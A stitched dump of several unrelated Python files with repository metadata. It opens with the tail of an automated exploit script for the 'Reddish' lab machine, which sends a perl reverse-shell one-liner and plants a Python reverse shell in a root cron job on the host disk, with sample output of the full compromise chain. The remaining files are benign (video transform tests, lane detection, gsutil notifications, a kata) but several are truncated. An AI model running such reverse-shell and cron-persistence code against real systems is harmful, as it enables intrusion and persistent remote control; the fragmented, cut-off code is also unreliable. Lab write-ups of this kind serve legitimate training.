socat.sendline("rsync -a " + CRONPL_PATH + "cronjob backup::src/etc/cron.d/")
for i in range(62):
p.status(str(61 - i))
time.sleep(1)
socat.sendline("perl -MFcntl=F_SETFL,F_GETFL,O_NONBLOCK -MSocket '-e$0=perl;socket($c,AF_INET,SOCK_STREAM,0)&&connect($c,pack_sockaddr_in("+ str(LPORT3) + ",inet_aton(\"backup\")))||die$!;fcntl$_,F_SETFL,O_NONBLOCK|fcntl$_,F_GETFL,0 for@d=(*STDIN,$c),@e=($c,*STDOUT);L:for(0,1){sysread($d[$_],$f,8**5)||exit and$f[$_].=$f if vec$g,$_*($h=fileno$c),1;substr$f[$_],0,syswrite($e[$_],$f[$_],8**5),\"\";vec($g,$_*$h,1)=($i=length$f[$_]<8**5);vec($j,$_||$h,1)=!!$i}select$g,$j,$k,5;goto L'")
output = socat.recvuntil("shell", timeout=20)
if "shell" in output:
p.success("OK")
else:
p.failure("FAIL")
sys.exit()
socat.sendline("script --return -c '/bin/bash -i' /dev/null")
socat.clean(1)
socat.sendline("stty raw -echo")
if response == "4":
socat.interactive()
sys.exit()
with log.progress("Sending reverse shell cronjob [" + LHOST + ":" +str(LPORT4)+ "] for root@host. Please wait") as p:
socat.sendline("mkdir /mnt/sda1")
socat.sendline("mount /dev/sda1 /mnt/sda1")
socat.sendline("cat /mnt/sda1/root/root.txt")
socat.sendline("echo 'import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(LPORT4) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");pty.spawn([\"/bin/bash\",\"-i\"]);s.close();exit();' > /mnt/sda1/tmp/" + UUIDNAME + ".py")
socat.sendline("echo '* * * * * root /usr/bin/python /tmp/" + UUIDNAME + ".py' > /mnt/sda1/etc/cron.d/" + UUIDNAME + "cronjob")
host_shell = listen(LPORT4, bindaddr=LHOST, timeout=65).wait_for_connection()
if host_shell.sock is None:
p.failure("FAIL")
sys.exit()
else:
p.success("OK")
host_shell.interactive()
sys.exit()
'''
$ ./autopwn_reddish.py
What shell do you want?
[1] root@nodered
[2] www-data@www
[3] root@www
[4] root@backup
[5] root@reddish
[6] Exit
Please enter a number 1-6: 5
[+] Getting our id: OK (id = 25af4604ab3402f2bdea796ac32bbcc3)
[+] Trying to bind to 10.10.12.229 on port 60000: Done
[+] Waiting for connections on 10.10.12.229:60000: Got connection from 10.10.10.94 on port 46784
[+] Loading node-red flows: OK
[+] Injecting base64-encoded socat: OK
[+] Injecting socat reverse shell via nodejs [10.10.12.229:60000]: OK
[+] Uploading 1994851d.php on the www container via redis: OK (user = www-data@www)
[+] Sending perl bind shell [www-data@www:61031] via 1994851d.php & trying to connect: OK
[+] Exploiting wildcards for privesc. Wait at most 180 secs for rsync backup job to run: OK
[+] Sending a cronjob for bind shell [root@backup:65104]. Please wait: OK
[+] Sending reverse shell cronjob 10.10.12.229:60001] for root@host. Please wait: OK
[+] Trying to bind to 10.10.12.229 on port 60001: Done
[+] Waiting for connections on 10.10.12.229:60001: Got connection from 10.10.10.94 on port 50432
[*] Switching to interactive mode
root@reddish:~# $
'''
| 53.090909 | 1,448 | 0.611768 |
6204c146ab9d8f200d7b8f6e6bb1d0148b8857e7 | 1,735 | py | Python | test/test_k_apaxiaaans.py | ivanlyon/exercises | 0792976ae2acb85187b26a52812f9ebdd119b5e8 | [
"MIT"
] | null | null | null | test/test_k_apaxiaaans.py | ivanlyon/exercises | 0792976ae2acb85187b26a52812f9ebdd119b5e8 | [
"MIT"
] | null | null | null | test/test_k_apaxiaaans.py | ivanlyon/exercises | 0792976ae2acb85187b26a52812f9ebdd119b5e8 | [
"MIT"
] | null | null | null | import io
import unittest
from unittest.mock import patch
from kattis import k_apaxiaaans
###############################################################################
###############################################################################
if __name__ == '__main__':
unittest.main()
| 36.145833 | 79 | 0.571182 |
6204c171addcdbab6da1839b62dea0022b3b30e5 | 829 | py | Python | kata/Greeting My Friends [Arrays].py | DJO3/code_wars | 8e9bc8cd903bfc61dafaf11cb9ff289f469e761f | [
"MIT"
] | null | null | null | kata/Greeting My Friends [Arrays].py | DJO3/code_wars | 8e9bc8cd903bfc61dafaf11cb9ff289f469e761f | [
"MIT"
] | null | null | null | kata/Greeting My Friends [Arrays].py | DJO3/code_wars | 8e9bc8cd903bfc61dafaf11cb9ff289f469e761f | [
"MIT"
] | null | null | null | """
We give you an Array of friend's list.
Write a function called greeting_for_all_friends that takes one argument, friends.
This method takes an array of friends name and return a greeting messages Array.
Message sample: for the friend "Bilal" we get "Hello, Bilal!"
Rules:
If the argument is null, the method should return null
If the argument is an empty array, the method should return null
If the argument is a valide array of strings, the method should return a hello message for every array entry
"""
import sys
if __name__ == "__main__":
f = sys.argv[1:]
print(greeting_for_all_friends(f))
# print(greeting_for_all_friends(["Bob"]))
| 28.586207 | 108 | 0.738239 |
6204f9cec65f309afe5538b66f4dfe8bac9af897 | 11,469 | py | Python | tests/test_transforms.py | rushyaP/pytorchvideo | 875b2df67312f5f4c7d581a332701cc7eca11c14 | [
"Apache-2.0"
] | 1 | 2021-05-20T21:25:14.000Z | 2021-05-20T21:25:14.000Z | tests/test_transforms.py | rushyaP/pytorchvideo | 875b2df67312f5f4c7d581a332701cc7eca11c14 | [
"Apache-2.0"
] | null | null | null | tests/test_transforms.py | rushyaP/pytorchvideo | 875b2df67312f5f4c7d581a332701cc7eca11c14 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import unittest
from collections import Counter
import numpy as np
import torch
from pytorchvideo.data.utils import thwc_to_cthw
from pytorchvideo.transforms import (
ApplyTransformToKey,
Normalize,
OpSampler,
RandomShortSideScale,
UniformCropVideo,
UniformTemporalSubsample,
)
from pytorchvideo.transforms.functional import (
convert_to_one_hot,
uniform_temporal_subsample_repeated,
short_side_scale,
uniform_crop,
uniform_temporal_subsample,
)
from torchvision.transforms import Compose
from torchvision.transforms._transforms_video import (
NormalizeVideo,
RandomCropVideo,
RandomHorizontalFlipVideo,
)
from utils import create_dummy_video_frames
| 38.35786 | 88 | 0.624553 |
62053e8d0f3189aeee01ea44d5273ade06244a54 | 20,905 | py | Python | udacity-program_self_driving_car_engineer_v1.0/project04-lane_detection_advanced/project/full_pipeline.py | linksdl/futuretec-project-self_driving_cars_projects | 38e8f14543132ec86a8bada8d708eefaef23fee8 | [
"MIT"
] | null | null | null | udacity-program_self_driving_car_engineer_v1.0/project04-lane_detection_advanced/project/full_pipeline.py | linksdl/futuretec-project-self_driving_cars_projects | 38e8f14543132ec86a8bada8d708eefaef23fee8 | [
"MIT"
] | null | null | null | udacity-program_self_driving_car_engineer_v1.0/project04-lane_detection_advanced/project/full_pipeline.py | linksdl/futuretec-project-self_driving_cars_projects | 38e8f14543132ec86a8bada8d708eefaef23fee8 | [
"MIT"
] | null | null | null | """
# !/usr/bin/env python
# -*- coding: utf-8 -*-
@Time : 2022/2/24 20:12
@Author : shengdl999links@gmail.com
@ProjectName : udacity-program_self_driving_car_engineer_v1.0_source.0
@File : full_pipeline.py
"""
import numpy as np
import cv2
import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import glob
from moviepy.editor import VideoFileClip
# Load in the chessboard calibration images to a list
cal_image_loc = glob.glob('camera_cal/calibration*.jpg')
# Prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objp = np.zeros((6 * 9, 3), np.float32)
objp[:, :2] = np.mgrid[0:9, 0:6].T.reshape(-1, 2)
# Arrays for later storing object points and image points
obj_points = [] # 3d points in real world space
img_points = [] # 2d points in image plane.
# Make a list of calibration images
calibration_images = []
for im in cal_image_loc:
img = mpimg.imread(im)
calibration_images.append(img)
verbose = False
# Iterate through images for their points
for image in calibration_images:
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Find the chessboard corners
pattern_found, corners = cv2.findChessboardCorners(gray, (9, 6), None)
if pattern_found is True:
obj_points.append(objp)
img_points.append(corners)
if verbose:
# Draw and display the corners
img = cv2.drawChessboardCorners(image, (9, 6), corners, pattern_found)
cv2.imshow('img', img)
cv2.waitKey(500)
if verbose:
cv2.destroyAllWindows()
# Returns camera calibration
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(obj_points, img_points, gray.shape[::-1], None, None)
def pipeline(img, s_thresh=(125, 255), sx_thresh=(10, 100), R_thresh=(200, 255), sobel_kernel=3):
""" Pipeline to create binary image.
This version uses thresholds on the R & S color channels and Sobelx.
Binary activation occurs where any two of the three are activated.
"""
distorted_img = np.copy(img)
dst = cv2.undistort(distorted_img, mtx, dist, None, mtx)
# Pull R
R = dst[:, :, 0]
# Convert to HLS colorspace
hls = cv2.cvtColor(dst, cv2.COLOR_RGB2HLS).astype(np.float)
h_channel = hls[:, :, 0]
l_channel = hls[:, :, 1]
s_channel = hls[:, :, 2]
# Sobelx - takes the derivate in x, absolute value, then rescale
sobelx = cv2.Sobel(l_channel, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
abs_sobelx = np.absolute(sobelx)
scaled_sobelx = np.uint8(255 * abs_sobelx / np.max(abs_sobelx))
# Threshold x gradient
sxbinary = np.zeros_like(scaled_sobelx)
sxbinary[(scaled_sobelx >= sx_thresh[0]) & (scaled_sobelx <= sx_thresh[1])] = 1
# Threshold R color channel
R_binary = np.zeros_like(R)
R_binary[(R >= R_thresh[0]) & (R <= R_thresh[1])] = 1
# Threshold color channel
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1
# If two of the three are activated, activate in the binary image
combined_binary = np.zeros_like(sxbinary)
combined_binary[((s_binary == 1) & (sxbinary == 1)) | ((sxbinary == 1) & (R_binary == 1))
| ((s_binary == 1) & (R_binary == 1))] = 1
return combined_binary
def birds_eye(img, mtx, dist):
""" Birds eye first undistorts the image, using the calibration from earlier.
Next, using defined source image points and destination points,
it will transform the image as if the road was viewed from above,
like a bird would see. Returns the birds eye image and transform matrix.
"""
# Put the image through the pipeline to get the binary image
binary_img = pipeline(img)
# Undistort
undist = cv2.undistort(binary_img, mtx, dist, None, mtx)
# Grab the image shape
img_size = (undist.shape[1], undist.shape[0])
# Source points - defined area of lane line edges
src = np.float32([[690, 450], [1110, img_size[1]], [175, img_size[1]], [595, 450]])
# 4 destination points to transfer
offset = 300 # offset for dst points
dst = np.float32([[img_size[0] - offset, 0], [img_size[0] - offset, img_size[1]],
[offset, img_size[1]], [offset, 0]])
# Use cv2.getPerspectiveTransform() to get M, the transform matrix
M = cv2.getPerspectiveTransform(src, dst)
# Use cv2.warpPerspective() to warp the image to a top-down view
top_down = cv2.warpPerspective(undist, M, img_size)
return top_down, M
def count_check(line):
""" Resets to using new sliding windows below if
upon failing five times in a row.
"""
if line.counter >= 5:
line.detected = False
def first_lines(img, mtx, dist):
""" First Lines uses the birds eye image from above,
creates a histogram of where the binary activations occur,
and uses sliding windows along the peak areas to estimate
where the lane lines are.
"""
# Load the birds eye image and transform matrix from birds_eye
binary_warped, perspective_M = birds_eye(img, mtx, dist)
# Histogram of the bottom half of the image
histogram = np.sum(binary_warped[binary_warped.shape[0] / 2:, :], axis=0)
# Output image an to draw on and visualize the result
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
# Find the peak of the left and right halves of the histogram
# These will be the starting point for the left and right lines
midpoint = np.int(histogram.shape[0] / 2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
# Choose the number of sliding windows
nwindows = 9
# Set height of windows
window_height = np.int(binary_warped.shape[0] / nwindows)
# Identify the x and y positions of all nonzero pixels in the image
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Current positions to be updated for each window
leftx_current = leftx_base
rightx_current = rightx_base
# Set the width of the windows +/- margin
margin = 100
# Set minimum number of pixels found to recenter window
minpix = 50
# Create empty lists to receive left and right lane pixel indices
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Identify window boundaries in x and y (and right and left)
win_y_low = binary_warped.shape[0] - (window + 1) * window_height
win_y_high = binary_warped.shape[0] - window * window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
# Draw the windows on the visualization image
cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)
cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2)
# Identify the nonzero pixels in x and y within the window
good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (
nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (
nonzerox < win_xright_high)).nonzero()[0]
# Append these indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# If you found > minpix pixels, recenter next window on their mean position
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
# Concatenate the arrays of indices
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each
# The challenge videos sometimes throw errors, so the below try first
# Upon the error being thrown, set line.detected to False
# Left line first
try:
n = 5
left_line.current_fit = np.polyfit(lefty, leftx, 2)
left_line.all_x = leftx
left_line.all_y = lefty
left_line.recent_fit.append(left_line.current_fit)
if len(left_line.recent_fit) > 1:
left_line.diffs = (left_line.recent_fit[-2] - left_line.recent_fit[-1]) / left_line.recent_fit[-2]
left_line.recent_fit = left_line.recent_fit[-n:]
left_line.best_fit = np.mean(left_line.recent_fit, axis=0)
left_fit = left_line.current_fit
left_line.detected = True
left_line.counter = 0
except TypeError:
left_fit = left_line.best_fit
left_line.detected = False
except np.linalg.LinAlgError:
left_fit = left_line.best_fit
left_line.detected = False
# Next, right line
try:
n = 5
right_line.current_fit = np.polyfit(righty, rightx, 2)
right_line.all_x = rightx
right_line.all_y = righty
right_line.recent_fit.append(right_line.current_fit)
if len(right_line.recent_fit) > 1:
right_line.diffs = (right_line.recent_fit[-2] - right_line.recent_fit[-1]) / right_line.recent_fit[-2]
right_line.recent_fit = right_line.recent_fit[-n:]
right_line.best_fit = np.mean(right_line.recent_fit, axis=0)
right_fit = right_line.current_fit
right_line.detected = True
right_line.counter = 0
except TypeError:
right_fit = right_line.best_fit
right_line.detected = False
except np.linalg.LinAlgError:
right_fit = right_line.best_fit
right_line.detected = False
def second_ord_poly(line, val):
""" Simple function being used to help calculate distance from center.
Only used within Draw Lines below. Finds the base of the line at the
bottom of the image.
"""
a = line[0]
b = line[1]
c = line[2]
formula = (a * val ** 2) + (b * val) + c
return formula
def draw_lines(img, mtx, dist):
""" Draw Lines will first check whether the lines are detected.
If not, go back up to First Lines. If they are, we do not have to search
the whole image for the lines. We can then draw the lines,
as well as detect where the car is in relation to the middle of the lane,
and what type of curvature it is driving at.
"""
# Pull in the image
binary_warped, perspective_M = birds_eye(img, mtx, dist)
# Check if lines were last detected; if not, re-run first_lines
if left_line.detected == False | right_line.detected == False:
first_lines(img, mtx, dist)
# Set the fit as the current fit for now
left_fit = left_line.current_fit
right_fit = right_line.current_fit
# Again, find the lane indicators
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
margin = 100
left_lane_inds = ((nonzerox > (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] - margin)) & (
nonzerox < (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] + margin)))
right_lane_inds = (
(nonzerox > (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] - margin)) & (
nonzerox < (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] + margin)))
# Set the x and y values of points on each line
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each again.
# Similar to first_lines, need to try in case of errors
# Left line first
try:
n = 5
left_line.current_fit = np.polyfit(lefty, leftx, 2)
left_line.all_x = leftx
left_line.all_y = lefty
left_line.recent_fit.append(left_line.current_fit)
if len(left_line.recent_fit) > 1:
left_line.diffs = (left_line.recent_fit[-2] - left_line.recent_fit[-1]) / left_line.recent_fit[-2]
left_line.recent_fit = left_line.recent_fit[-n:]
left_line.best_fit = np.mean(left_line.recent_fit, axis=0)
left_fit = left_line.current_fit
left_line.detected = True
left_line.counter = 0
except TypeError:
left_fit = left_line.best_fit
count_check(left_line)
except np.linalg.LinAlgError:
left_fit = left_line.best_fit
count_check(left_line)
# Now right line
try:
n = 5
right_line.current_fit = np.polyfit(righty, rightx, 2)
right_line.all_x = rightx
right_line.all_y = righty
right_line.recent_fit.append(right_line.current_fit)
if len(right_line.recent_fit) > 1:
right_line.diffs = (right_line.recent_fit[-2] - right_line.recent_fit[-1]) / right_line.recent_fit[-2]
right_line.recent_fit = right_line.recent_fit[-n:]
right_line.best_fit = np.mean(right_line.recent_fit, axis=0)
right_fit = right_line.current_fit
right_line.detected = True
right_line.counter = 0
except TypeError:
right_fit = right_line.best_fit
count_check(right_line)
except np.linalg.LinAlgError:
right_fit = right_line.best_fit
count_check(right_line)
# Generate x and y values for plotting
fity = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])
fit_leftx = left_fit[0] * fity ** 2 + left_fit[1] * fity + left_fit[2]
fit_rightx = right_fit[0] * fity ** 2 + right_fit[1] * fity + right_fit[2]
# Create an image to draw on and an image to show the selection window
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
window_img = np.zeros_like(out_img)
# Color in left and right line pixels
out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
# Generate a polygon to illustrate the search window area
# And recast the x and y points into usable format for cv2.fillPoly()
left_line_window1 = np.array([np.transpose(np.vstack([fit_leftx - margin, fity]))])
left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([fit_leftx + margin, fity])))])
left_line_pts = np.hstack((left_line_window1, left_line_window2))
right_line_window1 = np.array([np.transpose(np.vstack([fit_rightx - margin, fity]))])
right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([fit_rightx + margin, fity])))])
right_line_pts = np.hstack((right_line_window1, right_line_window2))
# Calculate the pixel curve radius
y_eval = np.max(fity)
left_curverad = ((1 + (2 * left_fit[0] * y_eval + left_fit[1]) ** 2) ** 1.5) / np.absolute(2 * left_fit[0])
right_curverad = ((1 + (2 * right_fit[0] * y_eval + right_fit[1]) ** 2) ** 1.5) / np.absolute(2 * right_fit[0])
# Define conversions in x and y from pixels space to meters
ym_per_pix = 30 / 720 # meters per pixel in y dimension
xm_per_pix = 3.7 / 700 # meters per pixel in x dimension
# Fit new polynomials to x,y in world space
left_fit_cr = np.polyfit(left_line.all_y * ym_per_pix, left_line.all_x * xm_per_pix, 2)
right_fit_cr = np.polyfit(right_line.all_y * ym_per_pix, right_line.all_x * xm_per_pix, 2)
# Calculate the new radii of curvature
left_curverad = ((1 + (2 * left_fit_cr[0] * y_eval * ym_per_pix + left_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
2 * left_fit_cr[0])
right_curverad = ((1 + (2 * right_fit_cr[0] * y_eval * ym_per_pix + right_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
2 * right_fit_cr[0])
avg_rad = round(np.mean([left_curverad, right_curverad]), 0)
rad_text = "Radius of Curvature = {}(m)".format(avg_rad)
# Calculating middle of the image, aka where the car camera is
middle_of_image = img.shape[1] / 2
car_position = middle_of_image * xm_per_pix
# Calculating middle of the lane
left_line_base = second_ord_poly(left_fit_cr, img.shape[0] * ym_per_pix)
right_line_base = second_ord_poly(right_fit_cr, img.shape[0] * ym_per_pix)
lane_mid = (left_line_base + right_line_base) / 2
# Calculate distance from center and list differently based on left or right
dist_from_center = lane_mid - car_position
if dist_from_center >= 0:
center_text = "{} meters left of center".format(round(dist_from_center, 2))
else:
center_text = "{} meters right of center".format(round(-dist_from_center, 2))
# List car's position in relation to middle on the image and radius of curvature
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, center_text, (10, 50), font, 1, (255, 255, 255), 2)
cv2.putText(img, rad_text, (10, 100), font, 1, (255, 255, 255), 2)
# Invert the transform matrix from birds_eye (to later make the image back to normal below)
Minv = np.linalg.inv(perspective_M)
# Create an image to draw the lines on
warp_zero = np.zeros_like(binary_warped).astype(np.uint8)
color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([fit_leftx, fity]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([fit_rightx, fity])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
# Combine the result with the original image
result = cv2.addWeighted(img, 1, newwarp, 0.3, 0)
return result
def process_image(image):
""" This processes through everything above.
Will return the image with car position, lane curvature, and lane lines drawn.
"""
result = draw_lines(image, mtx, dist)
return result
# Set the class lines equal to the variables used above
left_line = Left_Line()
right_line = Right_Line()
# Convert to video
# vid_output is where the image will be saved to
vid_output = 'project_video_detected.mp4'
# The file referenced in clip1 is the original video before anything has been done to it
# clip1 = VideoFileClip("project_video.mp4")
# NOTE: this function expects color images
# vid_clip = clip1.fl_image(process_image)
# vid_clip.write_videofile(vid_output, audio=False)
test_img_dir = 'test_images'
for test_img in os.listdir(test_img_dir):
frame = cv2.imread(os.path.join(test_img_dir, test_img))
blend = process_image(frame)
cv2.imwrite('output_images/{}'.format(test_img), blend)
plt.imshow(cv2.cvtColor(blend, code=cv2.COLOR_BGR2RGB))
plt.show()
| 39.743346 | 118 | 0.670796 |
620552e0f37628fdaf507905b2e507f52f6149a8 | 158 | py | Python | pyblaze/nn/data/__init__.py | Greenroom-Robotics/pyblaze | e45e27fbd400b6ae2365ad2347165c7b5154ac51 | [
"MIT"
] | 20 | 2020-03-29T08:43:15.000Z | 2021-12-17T21:38:17.000Z | pyblaze/nn/data/__init__.py | borchero/bxtorch | 8d01568c8ee9fc05f5b3c84ca3ec68ea74eef9eb | [
"MIT"
] | 4 | 2020-10-27T20:43:40.000Z | 2021-04-29T12:19:39.000Z | pyblaze/nn/data/__init__.py | borchero/bxtorch | 8d01568c8ee9fc05f5b3c84ca3ec68ea74eef9eb | [
"MIT"
] | 2 | 2020-08-16T18:10:49.000Z | 2021-03-31T23:17:28.000Z | import pyblaze.nn.data.extensions
from .noise import NoiseDataset, LabeledNoiseDataset
from .zip import ZipDataLoader
from .transform import TransformDataset
| 31.6 | 52 | 0.860759 |
62068b662c2e57cf87551975ea7649e2326a5cd6 | 3,128 | py | Python | main.py | MokkoFm/autoposting-comic-books | 07021369e88370aeda33fe4b5d4bb3cd8bf01399 | [
"MIT"
] | null | null | null | main.py | MokkoFm/autoposting-comic-books | 07021369e88370aeda33fe4b5d4bb3cd8bf01399 | [
"MIT"
] | null | null | null | main.py | MokkoFm/autoposting-comic-books | 07021369e88370aeda33fe4b5d4bb3cd8bf01399 | [
"MIT"
] | null | null | null | import requests
import os
import random
from dotenv import load_dotenv
import sys
if __name__ == "__main__":
main()
| 27.681416 | 79 | 0.636189 |
620690da1f145b5b2420aa8da8460ba8aab12a29 | 9,636 | py | Python | google-cloud-sdk/platform/gsutil/gslib/commands/notification.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | 1 | 2017-11-29T18:52:27.000Z | 2017-11-29T18:52:27.000Z | google-cloud-sdk/.install/.backup/platform/gsutil/gslib/commands/notification.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | null | null | null | google-cloud-sdk/.install/.backup/platform/gsutil/gslib/commands/notification.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | 1 | 2020-07-25T12:09:01.000Z | 2020-07-25T12:09:01.000Z | # -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides the notification command to gsutil."""
from __future__ import absolute_import
import getopt
import uuid
from gslib import metrics
from gslib.cloud_api import AccessDeniedException
from gslib.command import Command
from gslib.command import NO_MAX
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.help_provider import CreateHelpText
from gslib.storage_url import StorageUrlFromString
_WATCHBUCKET_SYNOPSIS = """
gsutil notification watchbucket [-i id] [-t token] app_url bucket_url...
"""
_STOPCHANNEL_SYNOPSIS = """
gsutil notification stopchannel channel_id resource_id
"""
_SYNOPSIS = _WATCHBUCKET_SYNOPSIS + _STOPCHANNEL_SYNOPSIS.lstrip('\n')
_WATCHBUCKET_DESCRIPTION = """
<B>WATCHBUCKET</B>
The watchbucket sub-command can be used to watch a bucket for object changes.
A service account must be used when running this command.
The app_url parameter must be an HTTPS URL to an application that will be
notified of changes to any object in the bucket. The URL endpoint must be
a verified domain on your project. See
`Notification Authorization <https://cloud.google.com/storage/docs/object-change-notification#_Authorization>`_
for details.
The optional id parameter can be used to assign a unique identifier to the
created notification channel. If not provided, a random UUID string will be
generated.
The optional token parameter can be used to validate notifications events.
To do this, set this custom token and store it to later verify that
notification events contain the client token you expect.
"""
_STOPCHANNEL_DESCRIPTION = """
<B>STOPCHANNEL</B>
The stopchannel sub-command can be used to stop sending change events to a
notification channel.
The channel_id and resource_id parameters should match the values from the
response of a bucket watch request.
"""
_DESCRIPTION = """
The notification command can be used to configure notifications.
For more information on the Object Change Notification feature, please see:
https://cloud.google.com/storage/docs/object-change-notification
The notification command has two sub-commands:
""" + _WATCHBUCKET_DESCRIPTION + _STOPCHANNEL_DESCRIPTION + """
<B>EXAMPLES</B>
Watch the bucket example-bucket for changes and send notifications to an
application server running at example.com:
gsutil notification watchbucket https://example.com/notify \\
gs://example-bucket
Assign identifier my-channel-id to the created notification channel:
gsutil notification watchbucket -i my-channel-id \\
https://example.com/notify gs://example-bucket
Set a custom client token that will be included with each notification event:
gsutil notification watchbucket -t my-client-token \\
https://example.com/notify gs://example-bucket
Stop the notification event channel with channel identifier channel1 and
resource identifier SoGqan08XDIFWr1Fv_nGpRJBHh8:
gsutil notification stopchannel channel1 SoGqan08XDIFWr1Fv_nGpRJBHh8
<B>NOTIFICATIONS AND PARALLEL COMPOSITE UPLOADS</B>
By default, gsutil enables parallel composite uploads for large files (see
"gsutil help cp"), which means that an upload of a large object can result
in multiple temporary component objects being uploaded before the actual
intended object is created. Any subscriber to notifications for this bucket
will then see a notification for each of these components being created and
deleted. If this is a concern for you, note that parallel composite uploads
can be disabled by setting "parallel_composite_upload_threshold = 0" in your
boto config file.
"""
NOTIFICATION_AUTHORIZATION_FAILED_MESSAGE = """
Watch bucket attempt failed:
{watch_error}
You attempted to watch a bucket with an application URL of:
{watch_url}
which is not authorized for your project. Please ensure that you are using
Service Account authentication and that the Service Account's project is
authorized for the application URL. Notification endpoint URLs must also be
whitelisted in your Cloud Console project. To do that, the domain must also be
verified using Google Webmain Tools. For instructions, please see:
https://cloud.google.com/storage/docs/object-change-notification#_Authorization
"""
_DETAILED_HELP_TEXT = CreateHelpText(_SYNOPSIS, _DESCRIPTION)
_watchbucket_help_text = (
CreateHelpText(_WATCHBUCKET_SYNOPSIS, _WATCHBUCKET_DESCRIPTION))
_stopchannel_help_text = (
CreateHelpText(_STOPCHANNEL_SYNOPSIS, _STOPCHANNEL_DESCRIPTION))
| 36.638783 | 113 | 0.732669 |
62082f1a3d2df0aa7c200e1ac37a24e5cc695f32 | 18,526 | py | Python | src/mecanum_robot_gazebo/src/tool/pingpong_utils.py | diddytpq/Predict-Tennisball-LandingPoint | 0ae4a9ff45fd4dd82b4b4e3cc2533e7fd5d1506a | [
"MIT"
] | null | null | null | src/mecanum_robot_gazebo/src/tool/pingpong_utils.py | diddytpq/Predict-Tennisball-LandingPoint | 0ae4a9ff45fd4dd82b4b4e3cc2533e7fd5d1506a | [
"MIT"
] | null | null | null | src/mecanum_robot_gazebo/src/tool/pingpong_utils.py | diddytpq/Predict-Tennisball-LandingPoint | 0ae4a9ff45fd4dd82b4b4e3cc2533e7fd5d1506a | [
"MIT"
] | null | null | null | import rospy
import sys
from gazebo_msgs.srv import *
from geometry_msgs.msg import *
import tf.transformations as tft
import numpy as np
import math
import roslib
from std_msgs.msg import Empty as EmptyMsg
from std_msgs.msg import Float64
